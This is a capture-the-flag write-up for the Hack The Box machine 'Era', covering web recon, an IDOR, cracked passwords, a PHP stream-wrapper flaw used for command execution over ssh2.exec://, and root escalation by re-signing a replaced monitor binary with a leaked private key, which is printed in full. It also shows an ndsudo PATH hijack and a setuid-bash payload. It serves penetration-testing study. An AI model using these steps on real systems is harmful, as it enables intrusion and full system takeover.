chmod +x ~/fakebin/4o1 && export PATH=~/fakebin:$PATH
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo megacli-disk-info
root@editor:/root# cat root.txt
9b087f0c1b038f19083d********
root@editor:/root#

:::Tip

<h1>Summary</h1>

🔹 Vulnerability

The ndsudo binary, included with the Netdata Agent and installed with the SUID bit, runs select system commands with root privileges. However, it fails to reference those commands using absolute paths, instead relying on the system’s $PATH variable to locate executables like megacli. This creates an Untrusted Search Path vulnerability, allowing attackers to substitute malicious binaries in a higher-precedence directory within $PATH, which ndsudo will execute as root.

🔹 How to Discover

Start by locating SUID binaries using find / -perm 4000 -type f, then inspect /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo to see which commands it allows. If the code doesn’t use full absolute paths for these commands, you can test for path hijacking by placing a fake binary in a writable directory and prepending it to $PATH before executing ndsudo.

🔹 Impact

Any user with permission to execute ndsudo can gain root privileges by exploiting the untrusted $PATH behavior. By placing a crafted malicious binary (with the same name as an allowed command) in a directory early in $PATH, the user can force ndsudo to execute that binary with elevated privileges, resulting in full system compromise. :::

</div>

Era HTB Writeup (Protected)

Thu, 31 Jul 2025 00:00:00 GMT

if (!passInput) {
  document.getElementById("error").textContent = "❌ Please enter a password";
  return;
}

try {
  const response = await fetch("https://passowrd-backend-production.up.railway.app/api/unlock", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ password: passInput, postId: "era" })
  });

  const res = await response.json();
  console.log(res);

  if (res.success) {
    document.getElementById("protected-content").style.display = "block";
    document.getElementById("locked").style.display = "none";
    document.getElementById("error").textContent = "";
  } else {
    document.getElementById("error").textContent = "❌ Wrong password";
  }
} catch (error) {
  console.error("Error during unlock:", error);
  document.getElementById("error").textContent = "❌ Server error, try again later";
}

} </script>

<h2>Recon</h2>

$ rustscan -a $target_ip --ulimit 2000 -r 1-65535 -- -A -sC -Pn

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.5
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 0309B7B14DF62A797B431119ADB37B14
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Era Designs
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

<p>Unusual Footing: FTP Wide Open, but SSH Nowhere in Sight</p>

🌐 Web Application Overview

The target is a sleek design agency with a minimal web front, showcasing a few high-profile users.

Visually, the site appears minimal, with nothing immediately standing out.

</div>

<div> <h1>Subdomain</h1>


$ ffuf -c -u "http://era.htb" -H "Host: FUZZ.era.htb" -w ~/wordlists/seclists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt -t 50 -fs 154

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0
________________________________________________

 :: Method           : GET
 :: URL              : http://era.htb
 :: Wordlist         : FUZZ: /home/Axura/wordlists/seclists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt
 :: Header           : Host: FUZZ.era.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

file                    [Status: 200, Size: 6765, Words: 2608, Lines: 234, Duration: 226ms]
:: Progress: [7920/1613291] :: Job [1/1] :: 230 req/sec :: Duration: [0:00:38] :: Errors: 0 ::

</div>

<div>

Discovered file.era.htb, a file management portal featuring upload capabilities, accessible only after login.

However, a backup entry point appears to be lurking beneath the surface.

An alternative login route is available through a security question challenge. </div>

<div>

Tried to log in with different usernames—invalid ones give a clean User not found. Which clearly opens the door to user enumeration.

</div>

<div>

<h1>Dirsearch</div>

<div>

A classic dirsearch scan is used to crawl the subdomain for hidden directories.

</div>

<div>

$ dirsearch -u 'http://file.era.htb' -x 404

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/Axura/ctf/HTB/era/reports/http_file.era.htb/_25-07-26_19-51-54.txt

Target: http://file.era.htb/

[19:51:54] Starting:
[19:53:03] 301 -  178B  - /assets  ->  http://file.era.htb/assets/
[19:53:04] 403 -  564B  - /assets/
[19:53:28] 302 -    0B  - /download.php  ->  login.php
[19:53:35] 301 -  178B  - /files  ->  http://file.era.htb/files/
[19:53:35] 403 -  564B  - /files/
[19:53:35] 403 -  564B  - /files/cache/
[19:53:35] 403 -  564B  - /files/tmp/
[19:53:44] 301 -  178B  - /images  ->  http://file.era.htb/images/
[19:53:44] 403 -  564B  - /images/
[19:53:56] 200 -   34KB - /LICENSE
[19:53:58] 200 -    9KB - /login.php
[19:54:01] 200 -   70B  - /logout.php
[19:54:03] 302 -    0B  - /manage.php  ->  login.php
[19:54:27] 200 -    3KB - /register.php  
[19:54:43] 302 -    0B  - /upload.php  ->  login.php

Task Completed

</div>

<div>

Discovered a hidden register.php endpoint on the site.

</div>

<div>

After registering a new account, we can log in to the file management system. </div>

<div>

<h1>IDOR</h1> <h2>ID Enumeration</h2>

After accessing the file management system with our registered account, we upload a test file to probe functionality.

It responds with a download URL like http://file.era.htb/download.php?id=7638. Tampering with the id parameter such as testing id=1 results in a clear rejection. </div>

Classic IDOR fingerprint. Time to bring in BurpSuite Intruder or fuzz the id parameter manually with ffuf

$ ffuf -u http://file.era.htb/download.php?id=FUZZ -b "PHPSESSID=o3v60htqgmni2m6igo4ilhi47v" -w <(seq 1 1000) -t 50 -fs 0 -mr ".zip" -c

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://file.era.htb/download.php?id=FUZZ
 :: Wordlist         : FUZZ: /proc/self/fd/11
 :: Header           : Cookie: PHPSESSID=o3v60htqgmni2m6igo4ilhi47v
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Regexp: .zip
 :: Filter           : Response size: 0
________________________________________________

54                      [Status: 200, Size: 6378, Words: 2552, Lines: 222, Duration: 375ms]
150                     [Status: 200, Size: 6366, Words: 2552, Lines: 222, Duration: 195ms]
:: Progress: [1000/1000] :: Job [1/1] :: 237 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

</div>

<div>

Beyond our upload, two notable files appear at IDs 150 and 54:

ID 150: signing.zip

ID 54: site-backup-30-08-24.zip

</div>

<div>

We download and extract both archive files.

$ ll
total 2.0M
-rw-r--r-- 1 kali kali 2.7K Jul 01 20:24 signing.zip
-rw-r--r-- 1 kali kali 2.0M Jul 01 20:24 site-backup-30-08-24.zip

$ unzip signing.zip -d signing
Archive:  signing.zip
  inflating: signing/key.pem
  inflating: signing/x509.genkey
  
$ unzip site-backup-30-08-24.zip -d backup
Archive:  site-backup-30-08-24.zip
  inflating: backup/LICENSE
  inflating: backup/bg.jpg
   creating: backup/css/
  inflating: backup/css/main.css.save
  inflating: backup/css/main.css
  inflating: backup/css/fontawesome-all.min.css
  inflating: backup/css/noscript.css
   creating: backup/css/images/
 extracting: backup/css/images/overlay.png
  inflating: backup/download.php
  inflating: backup/filedb.sqlite
   creating: backup/files/
  inflating: backup/files/.htaccess
 extracting: backup/files/index.php
  inflating: backup/functions.global.php
  inflating: backup/index.php
  inflating: backup/initial_layout.php
  inflating: backup/layout.php
  inflating: backup/layout_login.php
  inflating: backup/login.php
  inflating: backup/logout.php
  inflating: backup/main.png
  inflating: backup/manage.php
  inflating: backup/register.php
  inflating: backup/reset.php
  
  ...

</div>

<div>

<h2>Downloads </h2> <h3>Signing</h3>

The signing.zip contains two key files essential for certificate-based cryptography.

File	Description
key.pem	A private key file in PEM format, used for signing certificates, creating JWT signatures, or enabling HTTPS.
x509.genkey	An OpenSSL configuration file or key generation template

If the application uses this key to sign requests, cookies, or tokens, it’s game over we gain the power to forge trusted credentials.

</div>

<div>

<h1>Check Backup</h1>

The file site-backup-30-08-24.zip is a treasure trove containing the full source code and database dump.

$ tree backup

backup
├── bg.jpg
├── css
│   ├── fontawesome-all.min.css
│   ├── images
│   │   └── overlay.png
│   ├── main.css
│   ├── main.css.save
│   └── noscript.css
├── download.php
├── filedb.sqlite
├── files
│   └── index.php
├── functions.global.php
├── index.php
├── initial_layout.php
├── layout_login.php
├── layout.php
├── LICENSE
├── login.php
├── logout.php
├── main.png
├── manage.php
├── register.php
├── reset.php
├── ...

10 directories, 62 files

</div>

<div>

We can access the database using sqlite3:


$ sqlite3 backup/filedb.sqlite
SQLite version 3.49.1 2025-02-18 13:38:58
Enter ".help" for usage hints.

sqlite> .tables
files  users

sqlite> SELECT * FROM users;
1|admin_ef01cab31aa|$2y$10$wDbohsUaezf74d3sMNRPi.o93wDxJqphM2m0VVUp41If6WrYr.QPC|600|Maria|Oliver|Ottawa
2|eric|$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm|-1|||
3|veronica|$2y$10$xQmS7JL8UT4B3jAYK7jsNeZ4I.YqaFFnZNA/2GCxLveQ805kuQGOK|-1|||
4|yuri|$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.|-1|||
5|john|$2a$10$iccCEz6.5.W2p7CSBOr3ReaOqyNmINMH1LaqeQaL22a1T1V/IddE6|-1|||
6|ethan|$2a$10$PkV/LAd07ftxVzBHhrpgcOwD3G1omX4Dk2Y56Tv9DpuUV/dh/a1wC|-1|||

</div>

<div>

The password hashes use bcrypt, but due to low cost factors, we successfully cracked the passwords for eric and yuri.

eric: america
yuri: mustang

</div>

The same credentials were confirmed earlier through brute force, though the password for the admin user admin_ef01cab31aa remains uncrackable. </div>

<div> <h1>Source Dive</h1>

We’ve now gathered a substantial set of resources for analysis.

$ tree . -L2

.
├── apache2_conf
│   ├── 000-default.conf
│   ├── apache2.conf
│   ├── file.conf
│   └── ports.conf
├── backup
│   ├── bg.jpg
│   ├── css
│   ├── download.php
│   ├── filedb.sqlite
│   ├── files
│   ├── functions.global.php
│   ├── index.php
│   ├── initial_layout.php
│   ├── layout_login.php
│   ├── layout.php
│   ├── LICENSE
│   ├── login.php
│   ├── logout.php
│   ├── main.png
│   ├── manage.php
│   ├── register.php
│   ├── reset.php
│   ├── sass
│   ├── screen-download.png
│   ├── screen-login.png
│   ├── screen-main.png
│   ├── screen-manage.png
│   ├── screen-upload.png
│   ├── security_login.php
│   ├── upload.php
│   └── webfonts
├── php8.1_conf
│   ├── build
│   ├── calendar.so
│   ├── ctype.so
│   ├── dom.so
│   ├── exif.so
│   ├── ffi.so
│   ├── fileinfo.so
│   ├── ftp.so
│   ├── gettext.so
│   ├── iconv.so
│   ├── opcache.so
│   ├── pdo.so
│   ├── pdo_sqlite.so
│   ├── phar.so
│   ├── posix.so
│   ├── readline.so
│   ├── shmop.so
│   ├── simplexml.so
│   ├── sockets.so
│   ├── sqlite3.so
│   ├── ssh2.so
│   ├── sysvmsg.so
│   ├── sysvsem.so
│   ├── sysvshm.so
│   ├── tokenizer.so
│   ├── xmlreader.so
│   ├── xml.so
│   ├── xmlwriter.so
│   ├── xsl.so
│   └── zip.so
└── signing
    ├── key.pem
    └── x509.genkey

We can start some code auditing work on the found backup source code. </div>

<div>

<h1>1. upload.php</h1>

We begin with upload.php, as it provides direct file input interaction potential for upload-based exploitation.

if ($_POST['fsubmitted'] == "true") {

    $target_dir = "files/";

    // If the user is uploading multiple files, we'll ZIP them
    if (count($_FILES["upfile"]["name"]) > 1) {
        $target_file = $target_dir . "Era_User$currentUser " . date('Y-m-d H_i_s') . ".zip";
    } else {
        $target_file = $target_dir . basename($_FILES["upfile"]["name"][0]);
    }

    $uploadOk = true;

All uploaded files (including ZIPs) are stored in the /files/ directory — a predictable and accessible path.
Multi-file upload results in a .zip archive, named using the user ID and a timestamp.
Single file upload is saved as-is using basename(), giving the user control over the filename and extension.
No extension sanitization potentially dangerous types like .php, .phar, etc., are accepted.

    // Check for harmful patterns
    if (strpos($target_file, "'") !== false || strpos($target_file, '"') !== false) {
        echo '<div class="upload-error">Error: Tampering attempt detected.</div>';
        $uploadOk = false;
    }

    $fileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

Attempts to block ' and " in filenames. That's it.
No restriction on file types, content, or MIME dangerously flexible.

       if ($file_upload_complete) {
            $newFileId = rand(1, 9999);
            while (in_array($newFileId, $fileListId)) {
                $newFileId = rand(1, 9999);
            }

            $current_date = time();

            $publish = contactDB("INSERT INTO files (fileid, filepath, fileowner, filedate)
                                  VALUES ($newFileId, '$target_file', $currentUser, $current_date);", 0);

            echo '<div class="upload-success">Upload Successful!</div>';

            $download_link = get_download_link($newFileId);

File metadata resides in a SQLite files table, indexed by a fileid between 1–9999 making it a low-entropy IDOR target. Download links are served via the get_download_link() function. The upload script accepts arbitrary file types, including .php and .phar, though current conditions prevent direct exploitation. Uploaded files are placed in a non-executable /files/ directory, blocking .php execution. No LFI is present to trigger uploads, and no unserialize() calls on user-controlled phar:// paths have been identified yet. </div> <script async="async" data-cfasync="false" src="//pl27351172.profitableratecpm.com/e8e96e069d8bb59ebeb0db9859431613/invoke.js"></script> <div id="container-e8e96e069d8bb59ebeb0db9859431613"></div> <div>

<p>Conclusion: while the upload mechanism is insecure by design, it remains non-exploitable in the current environment.</p> <h1>2.download.php</<h1>

if (!isset($_GET['id'])) {
	header('location: index.php'); // user loaded without requesting file by id
	die();
}

if (!is_numeric($_GET['id'])) {
	header('location: index.php'); // user requested non-numeric (invalid) file id
	die();
}

$reqFile = $_GET['id'];

$fetched = contactDB("SELECT * FROM files WHERE fileid='$reqFile';", 1);

<p>If the requested file exists, it proceeds to return it:</p>

$realFile = (count($fetched) != 0); // Set realFile to true if we found the file id, false if we didn't find it

if (!$realFile) {
	echo deliverTop("Era - Download");

	echo deliverMiddle("File Not Found", "The file you requested doesn't exist on this server", "");

	echo deliverBottom();
} else {
	$fileName = str_replace("files/", "", $fetched[0]);


	// Allow immediate file download
	if ($_GET['dl'] === "true") {

		header('Content-Type: application/octet-stream');
		header("Content-Transfer-Encoding: Binary");
		header("Content-disposition: attachment; filename=\"" .$fileName. "\"");
		readfile($fetched[0]);    
        
    ...
        
}

</div>

<div>

Although the dl=true parameter doesn’t appear in the URL, it is injected dynamically through the HTML source. The intriguing section lies under the show=true branch (highlighted in purple), active only for the admin user (erauser === 1). This code contains a critical logic flaw.

// Check if it's a wrapper (://)
if (strpos($format, '://') !== false) {
    // Treats it as a protocol wrapper
    // e.g. http://, file://, php://, etc.
    $wrapper = $format;
    header('Content-Type: application/octet-stream');
} else {
    $wrapper = '';
    header('Content-Type: text/html');
}

try {
    // Build the final file path
    $file = $fetched[0];
    // If a wrapper is set
    // [!] This constructs an arbitrary protocol + file path.
	$file_content = fopen($wrapper ? $wrapper . $file : $file, 'r');
    
    ...
        
}

The $wrapper string is entirely attacker-controlled. By specifying wrappers like file://, php://, or ssh2://, an admin user can access arbitrary resources via stream wrappers—exemplifying a classic Arbitrary Protocol File Read (APFR) vulnerability.

With ssh2.so and phar.so modules present and presumably enabled, this vulnerability paves the way for:

LFI via file://
PHP filter chain attacks using php://filter
SSRF or RCE through ssh2:// </div>

<div> <h1>3. reset.php</h1>

Before leveraging the Arbitrary Protocol Execution, privilege escalation to the admin account is required. Enter reset.php an unprotected IDOR vulnerability. No safeguards exist to stop low-privileged users from modifying security question answers for any account, including the admin admin_ef01cab31aa. By resetting the admin’s answers and leveraging the previously identified /security_login.php endpoint, the admin account can be hijacked. </div>

<div>

<h1>Attack Execution</h1>

With all elements aligned, we can now orchestrate a full attack chain to obtain Remote Code Execution (RCE): </div>

<div>

The attack starts by exploiting the IDOR vulnerability in reset.php. Using Burp Suite Repeater, capture the POST request and substitute the username with admin_ef01cab31aa.

</div>

<div>

<h1>2. Admin Impersonation</h1>

Once reset, use the security_login.php endpoint to impersonate the admin: Once logged in, upload a dummy file to obtain a valid file ID. Then, capture the download request along with the admin session cookie using Burp Suite.

Send the request to Repeater and test the stream wrapper logic using the file:// protocol with an existing ID, such as 54 or 150. This confirms successful access to the stream wrapper execution path with admin privileges. </div>

<div> <h1>3. Abuse SSH2 Stream</h1> <h2> > PHP | ssh2://</h2>

Since ssh2.so is enabled (confirmed via the downloaded PHP config), we can leverage the ssh2.exec:// protocol, which opens an SSH connection and executes a remote command.

From PHP docs, available stream wrappers include:

ssh2.shell://
ssh2.exec://
ssh2.tunnel://
ssh2.sftp://
ssh2.scp://

This means we can achieve remote command execution via ssh2.exec://:

ssh2.exec://user:pass@example.com:22/usr/local/bin/some_command

This example establishes an SSH connection to example.com, performs authentication, and executes some_command.

</div>

<div>

This functions as an SSRF primitive using protocol smuggling, ultimately enabling command execution. </div>

<div> <h1>Exploit</h1>

Upload any file to obtain its file ID, open the download request in Burp, send it to Repeater, and modify the format parameter in the URL.

By targeting the local SSH service and authenticating as yuri (credentials previously obtained), we can craft a reverse shell payload.

:::note Insert this into the Burp Repeater URL and URL-encode it (Ctrl+U) within the format= parameter. </div> <div> <h1>Login To user Eric</h1>

since we dont have flag lets login to another user called eric we already have passowrd of user eric:america

yuri@era:/home$ su - eric
su - eric
password : america
ls
user.txt
cat *
vdadar8s5daaccsff******

</div>

<div>

Begin by establishing a stable shell as the user eric.

script -c bash /dev/null

</div>

<div> <h2>Internal Footprinting</h2> <h1>LinPEAS</h1>

╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root eric 33 Jul 27 01:12 /home/eric/user.txt
-rwxrw---- 1 root devs 16544 Jul 27 08:15 /opt/AV/periodic-checks/monitor
-rw-rw---- 1 root devs 103 Jul 27 08:15 /opt/AV/periodic-checks/status.log

╔══════════╣ Unexpected in /opt (usually empty)
total 12
drwxrwxr-x  3 root root 4096 Jul 22 08:42 .
drwxr-xr-x 20 root root 4096 Jul 22 08:41 ..
drwxrwxr--  3 root devs 4096 Jul 22 08:42 AV

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/home/eric/.gnupg/trustdb.gpg
/home/eric/.gnupg/pubring.kbx
/opt/AV/periodic-checks/monitor
/opt/AV/periodic-checks/status.log

</div> <div> <script type="text/javascript"> atOptions = { 'key' : '5e20fa4a9329609198fd43c2b01a1bae', 'format' : 'iframe', 'height' : 90, 'width' : 728, 'params' : {} }; </script> <script type="text/javascript" src="//www.highperformanceformat.com/5e20fa4a9329609198fd43c2b01a1bae/invoke.js"></script>

This strongly indicates that something noteworthy resides under /opt.

eric@era:~$ ls -aRhl /opt

/opt:
total 12K
drwxrwxr-x  3 root root 4.0K Jul 22 08:42 .
drwxr-xr-x 20 root root 4.0K Jul 22 08:41 ..
drwxrwxr--  3 root devs 4.0K Jul 22 08:42 AV

/opt/AV:
total 12K
drwxrwxr-- 3 root devs 4.0K Jul 22 08:42 .
drwxrwxr-x 3 root root 4.0K Jul 22 08:42 ..
drwxrwxr-- 2 root devs 4.0K Jul 27 08:22 periodic-checks

/opt/AV/periodic-checks:
total 32K
drwxrwxr-- 2 root devs 4.0K Jul 27 08:22 .
drwxrwxr-- 3 root devs 4.0K Jul 22 08:42 ..
-rwxrw---- 1 root devs  17K Jul 27 08:22 monitor
-rw-rw---- 1 root devs  205 Jul 27 08:22 status.log

</div>

<div>

The monitor binary is owned by root, yet both it and status.log have group write permissions for the devs group, which includes eric presenting a clear avenue for privilege escalation.

<h1>Core Elements</h1> <h2>Binary Takeover</h2>

eric@era:~$ file /opt/AV/periodic-checks/monitor

/opt/AV/periodic-checks/monitor: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=45a4bb1db5df48dcc085cc062103da3761dd8eaf, for GNU/Linux 3.2.0, not stripped

The monitor binary runs with root privileges, but since the devs group has write access to its parent directories—and eric is part of that group we’re able to rename or replace it without restriction.

eric@era:/opt/AV/periodic-checks$ chmod +x monitor
chmod: changing permissions of 'monitor': Operation not permitted

eric@era:/opt/AV/periodic-checks$ mv monitor monitor.bak
mv monitor monitor.bak

eric@era:/opt/AV/periodic-checks$ ll
drwxrwxr-- 2 root devs  4096 Jul 27 08:26 ./
drwxrwxr-- 3 root devs  4096 Jul 22 08:42 ../
-rwxrw---- 1 root devs 16544 Jul 27 08:26 monitor.bak
-rw-rw---- 1 root devs   307 Jul 27 08:26 status.log

This creates a textbook case of binary replacement, allowing us to plant a payload that gets executed with elevated privileges.

</div> <div> <h2>2. Scheduled Task</h2>

Frequent updates to status.log suggest it's actively maintained by the monitor binary.

eric@era:~$ cat /opt/AV/periodic-checks/status.log

[*] System scan initiated...
[*] No threats detected. Shutting down...
[SUCCESS] No threats detected.

</div> <div> <h2>This suggests:</h2>

A scheduled task, likely executed by root, runs the monitor binary. With the ability to replace it, we effectively control what code is executed with root privileges. </div>

<div> <h1>3. Signature</h1> <h2>Self Signed</h2>

Simply replacing monitor won’t suffice it’s guarded by a signature verification check. For instance, swapping it with a basic bash script would fail validation.

eric@era:/opt/AV/periodic-checks$ mv monitor monitor.bak

eric@era:/opt/AV/periodic-checks$ echo -e '#!/bin/bash\nchmod +s /bin/bash' > monitor

eric@era:/opt/AV/periodic-checks$ ls
monitor  monitor.bak  status.log

eric@era:/opt/AV/periodic-checks$ cat monitor
#!/bin/bash
chmod +s /bin/bash

The status.log file logs the error from the most recent execution attempt.

eric@era:/opt/AV/periodic-checks$ cat status.log

[*] System scan initiated...
[*] No threats detected. Shutting down...
[SUCCESS] No threats detected.
objcopy: /opt/AV/periodic-checks/monitor: file format not recognized
[ERROR] Executable not signed. Tampering attempt detected. Skipping.

This reveals that the binary needs to be a properly signed ELF executable. Notably, the signature is embedded within the ELF itself—rather than provided as an external .sig or .pem file. We can verify this by inspecting custom ELF sections.

eric@era:/opt/AV/periodic-checks$ readelf -S /opt/AV/periodic-checks/monitor | grep -i sig

  [28] .text_sig         PROGBITS         0000000000000000  00003040

The ELF binary includes a custom section called .text_sig. When the system invokes the monitor binary—likely through something like initiate_monitoring.sh it uses objcopy to extract this section and verifies it against the contents of the .text segment.

Therefore, we can utilize objdump to examine the contents of the section.

$ objdump -s -j .text_sig monitor

monitor:     file format elf64-x86-64

Contents of section .text_sig:
 0000 308201c6 06092a86 4886f70d 010702a0  0.....*.H.......
 0010 8201b730 8201b302 0101310d 300b0609  ...0......1.0...
 0020 60864801 65030402 01300b06 092a8648  `.H.e....0...*.H
 0030 86f70d01 07013182 01903082 018c0201  ......1...0.....
 0040 01306730 4f311130 0f060355 040a0c08  .0g0O1.0...U....
 0050 45726120 496e632e 31193017 06035504  Era Inc.1.0...U.
 0060 030c1045 4c462076 65726966 69636174  ...ELF verificat
 0070 696f6e31 1f301d06 092a8648 86f70d01  ion1.0...*.H....
 0080 09011610 79757269 76696368 40657261  ....yurivich@era
 0090 2e636f6d 02146d63 4aa981e1 93a1e448  .com..mcJ......H
 00a0 c5205ff7 9b84e6b6 f50b300b 06096086  . _.......0...`.
 00b0 48016503 04020130 0d06092a 864886f7  H.e....0...*.H..
 00c0 0d010101 05000482 01006a8d 5090e77a  ..........j.P..z
 00d0 a22431d3 e629241a c7eec906 dce87592  .$1..)$.......u.
 00e0 c90733b8 5ea5c466 db04a35a 28648853  ..3.^..f...Z(d.S
 00f0 00f2775c fbe983ae 833d2c36 7030985a  ..w\.....=,6p0.Z
 0100 b5d9ae28 cfbf75db 8e402955 c9bef8d3  ...(..u..@)U....
 0110 058e6ee1 1eb435bb 30a3056d b85074bc  ..n...5.0..m.Pt.
 0120 4e15fc44 0a57e3f6 2f4b5ecd 0e6b222d  N..D.W../K^..k"-
 0130 c4039189 2c7ded05 fe45a3e9 c00f0610  ....,}...E......
 0140 f8a653ab f72571aa cbf2ff38 238658d0  ..S..%q....8#.X.
 0150 8dcfba33 1c6d2092 8c01c77d 4e49ea94  ...3.m ....}NI..
 0160 670c9de9 42779e09 67143d81 49209fc1  g...Bw..g.=.I ..
 0170 24005880 04c7cebf d398ec6d 55b50333  $.X........mU..3
 0180 db46f2ab 74e6aa24 e9dc76d2 c9c4183b  .F..t..$..v....;
 0190 991bc0f4 762b1c09 1d82317c aab31e88  ....v+....1|....
 01a0 dfc04871 2bb9ac8a 0dbb6cd7 cd6bdcaa  ..Hq+.....l..k..
 01b0 c96c2afe faa17944 ebdd7a6e 6f2e91da  .l*...yD..zno...
 01c0 5e41e0e6 5ddeec93 47ee               ^A..]...G.

The output reveals a standard ASN.1 DER-encoded format containing elements such as:

Era Inc. (Issuer)
ELF verification (Common Name)
yurivich@era.com (Email)
An extensive RSA signature block

This confirms the system validates binaries by extracting the .text_sig section and checking its integrity, rejecting any unsigned or altered binaries. </div>

<div> <h1>OpenSSL Config<h1>

Previously, we identified a signing mechanism located within the FTP share:

$ tree signing

signing
├── key.pem
└── x509.genkey

<di>

[ req ]
default_bits = 2048
distinguished_name = req_distinguished_name
prompt = no
string_mask = utf8only
x509_extensions = myexts

[ req_distinguished_name ]
O = Era Inc.
CN = ELF verification
emailAddress = yurivich@era.com

[ myexts ]
basicConstraints=critical,CA:FALSE
keyUsage=digitalSignature
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid

</div>

<div>

This aligns with the signature details observed earlier.

The [ myexts ] section verifies that the certificate is meant solely for digital signatures, without any Certificate Authority capabilities.

</div> <div> <h1>Private RSA Key</h1>

actual private key:

$ file key.pem

key.pem: OpenSSH private key (no password)

Nevertheless, executing:

$ openssl rsa -in key.pem -check

RSA key ok
writing RSA key
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCqKH30+RZjkxiV
JMnuB6b1dDbWUaw3p2QyQvWMbFvsi7zG1kE2LBrKjsEyvcxo8m0wL9feuFiOlciD
MamELMAW0UjMyew01+S+bAEcOawH81bVahxNkA4hHi9d/rysTe/dnNkh08KgHhzF
mTApjbV0MQwUDOLXSw9eHd+1VJClwhwAsL4xdk4pQS6dAuJEnx3IzNoQ23f+dPqT
CMAAWST67VPZjSjwW1/HHNi12ePewEJRGB+2K+YeGj+lxShW/I1jYEHnsOrliM2h
ZvOLqS9LjhqfI9+Q1RxIQF69yAEUeN4lYupa0Ghr2h96YLRE5YyXaBxdSA4gLGOV
HZgMl2i/AgMBAAECggEALCO53NjamnT3bQTwjtsUT9rYOMtR8dPt1W3yNX2McPWk
wC2nF+7j+kSC0G9UvaqZcWUPyfonGsG3FHVHBH75S1H54QnGSMTyVQU+WnyJaDyS
+2R9uA8U4zlpzye7+LR08xdzaed9Nrzo+Mcuq7DTb7Mjb3YSSAf0EhWMyQSJSz38
nKOcQBQhwdmiZMnVQp7X4XE73+2Wft9NSeedzCpYRZHrI820O+4MeQrumfVijbL2
xx3o0pnvEnXiqbxJjYQS8gjSUAFCc5A0fHMGmVpvL+u7Sv40mj/rnGvDEAnaNf+j
SlC9KdF5z9gWAPii7JQtTzWzxDinUxNUhlJ00df29QKBgQDsAkzNjHAHNKVexJ4q
4CREawOfdB/Pe0lm3dNf5UlEbgNWVKExgN/dEhTLVYgpVXJiZJhKPGMhSnhZ/0oW
gSAvYcpPsuvZ/WN7lseTsH6jbRyVgd8mCF4JiCw3gusoBfCtp9spy8Vjs0mcWHRW
PRY8QbMG/SUCnUS0KuT1ikiIYwKBgQC4kkKlyVy2+Z3/zMPTCla/IV6/EiLidSdn
RHfDx8l67Dc03thgAaKFUYMVpwia3/UXQS9TPj9Ay+DDkkXsnx8m1pMxV0wtkrec
pVrSB9QvmdLYuuonmG8nlgHs4bfl/JO/+Y7lz/Um1qM7aoZyPFEeZTeh6qM2s+7K
kBnSvng29QKBgQCszhpSPswgWonjU+/D0Q59EiY68JoCH3FlYnLMumPlOPA0nA7S
4lwH0J9tKpliOnBgXuurH4At9gsdSnGC/NUGHII3zPgoSwI2kfZby1VOcCwHxGoR
vPqt3AkUNEXerkrFvCwa9Fr5X2M8mP/FzUCkqi5dpakduu19RhMTPkdRpQKBgQCJ
tU6WpUtQlaNF1IASuHcKeZpYUu7GKYSxrsrwvuJbnVx/TPkBgJbCg5ObFxn7e7dA
l3j40cudy7+yCzOynPJAJv6BZNHIetwVuuWtKPwuW8WNwL+ttTTRw0FCfRKZPL78
D/WHD4aoaKI3VX5kQw5+8CP24brOuKckaSlrLINC9QKBgDs90fIyrlg6YGB4r6Ey
4vXtVImpvnjfcNvAmgDwuY/zzLZv8Y5DJWTe8uxpiPcopa1oC6V7BzvIls+CC7VC
hc7aWcAJeTlk3hBHj7tpcfwNwk1zgcr1vuytFw64x2nq5odIS+80ThZTcGedTuj1
qKTzxN/SefLdu9+8MXlVZBWj
-----END PRIVATE KEY-----

…verifies that this is a valid RSA private key compatible with OpenSSL signing functions. The private key matches the public key used in the signature verification process probably embedded in the script or retrieved from a secure store. This enables us to re-sign any custom ELF binary we create, as long as we maintain the .text_sig structure required by the verifier. </div> <div> <h1>Exploit Overview</h1>

To hijack the privileged monitor binary, we first need to sign our malicious payload with the Era Inc. signature scheme.

